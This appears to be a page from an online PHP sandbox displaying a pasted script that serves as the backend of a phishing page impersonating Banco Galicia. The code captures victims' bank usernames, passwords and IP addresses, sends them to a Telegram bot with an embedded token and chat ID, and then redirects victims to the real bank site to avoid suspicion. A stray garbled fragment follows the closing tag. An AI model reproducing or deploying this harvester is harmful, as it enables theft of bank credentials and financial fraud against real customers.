2131 - PHP Online

Form of PHP Sandbox

Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php in the places where the PHP script should be executed.

Your result can be seen below.

Result of php executing

Full code of 2131.php

  1. <?php
  2. error_reporting(0);
  3. $id = '-902923452';
  4. $key = '6286746238:AAH7tYxKBKeMp4Wk9a2st_PCoOCgl6JWYG4';
  5. $out = "https://wsec06.bancogalicia.com.ar/Error/ErrorOut";
  7. function sendTg($msg, $key, $id) {
  8.    $apiToken = $key;
  9.    $data = [
  10.         'chat_id' => $id,
  11.        'text' => $msg
  12.    ];
  13.    $response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" . http_build_query($data)."&parse_mode=html");
  14. }
  16. $ip = $_SERVER['REMOTE_ADDR']; 
  18. if (isset($_POST['usuario'])) {
  19.   $msg  = "➖➖➖➖[ OFFGALICIA ]➖➖➖➖\r\n";
  20.   $msg .= "\r\n";
  21.   $msg .= "????Direccion IP: ".$ip."\r\n";
  22.   $msg .= "\r\n";
  23.   $msg .= "\r\n";
  24.   $msg .= "\r\n";
  25.   $msg .= "✔️User: {$_POST['usuario']}\r\n";
  26.   $msg .= "\r\n";
  27.   $msg .= "✔️Pass: {$_POST['keygen']}\r\n";
  28.   $msg .= "\r\n\r\n\r\n";
  29.   sendTg($msg, $key, $id);
  30.   header("Location: https://wsec06.bancogalicia.com.ar/Error/ErrorOut");
  31. }
  33. ?>aes-256-cbc',  $key, OPENSSL_RAW_DATA, $vector)."\n";
File Description
  • 2131
  • PHP Code
  • 14 May-2023
  • 990 Bytes
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